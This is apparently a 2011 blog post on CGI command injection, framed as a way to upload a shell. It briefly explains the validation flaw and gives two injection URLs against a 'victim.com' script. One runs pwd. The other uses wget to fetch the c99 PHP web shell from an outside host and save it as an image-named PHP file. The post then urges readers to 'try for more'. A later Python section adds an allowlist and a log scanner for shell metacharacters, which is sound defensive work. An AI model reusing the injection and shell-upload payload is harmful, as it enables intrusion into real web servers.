RCE to shell upload [CGI]

September 27, 2011

Author: Sandeep Kamble
Released Date: September 9, 2010

Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept information passed from the client as a replacement for the specified target.


1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.

Example site:-

The front-end interface to a CGI program is an HTML document called a form. Forms include the HTML tag “Input”. Each “Input” tag has a variable name associated with it. This is the variable name that forms the left-hand side of the previously mentioned variable=value token. The contents of the variable form the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the “Input” field. However, if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the “Input” data will pass the data directly to the interpreter.

http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|

Shell upload command:-

http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|




Improper use of CGI scripts exposes a system to a number of security vulnerabilities. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.
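The input-validation failure described above, seen from the defending side (an added example, not part of the original post): a server-side allowlist for the `article` parameter and a log check that flags requests carrying shell metacharacters. The ID shape, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: article IDs have the shape seen in the post (digits, dot, digits).
ARTICLE_ID = re.compile(r"[0-9]{1,20}\.[0-9]{1,20}")
# Characters a shell or a pipe-aware file open treats specially.
SHELL_META = re.compile(r"[|;&`$<>(){}\\\n\r\x00]")
# Apache common/combined log prefix: client, ident, user, [time], "METHOD target PROTO"
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|PUT) (\S+) [^"]*"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [27/Sep/2011:10:00:01 +0000] "GET /newswire/newsaction.cgi?article=999999998473.992039800995 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Sep/2011:10:00:09 +0000] "GET /newswire/newsaction.cgi?article=999999998473.992039800995|pwd| HTTP/1.1" 200 48',
    '203.0.113.7 - - [27/Sep/2011:10:00:15 +0000] "GET /newswire/newsaction.cgi?article=1.2%7Cpwd%7C HTTP/1.1" 200 48',
]


def validate_article(value):
    """Server-side allowlist: return the ID unchanged or raise ValueError."""
    if not ARTICLE_ID.fullmatch(value):
        raise ValueError("rejected article id: %r" % value)
    return value


def suspicious_params(target):
    """Names of query parameters whose URL-decoded value holds shell metacharacters."""
    flagged = set()
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        if SHELL_META.search(unquote_plus(raw)):
            flagged.add(name)
    return sorted(flagged)


def scan_log(lines):
    """Return (client, flagged parameter names) for every request worth triage."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        flagged = suspicious_params(m.group(2)) if m else []
        if flagged:
            hits.append((m.group(1), flagged))
    return hits


if __name__ == "__main__":
    for client, params in scan_log(SAMPLE_LOG):
        print(client, params)
```

The allowlist belongs in the CGI script itself, before the value reaches any file or command call; the log check is a triage aid and decodes percent-encoding first so that `%7C` is caught as well as a raw `|`.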

After shell upload you can try for more. I hope you find it useful, be safe!
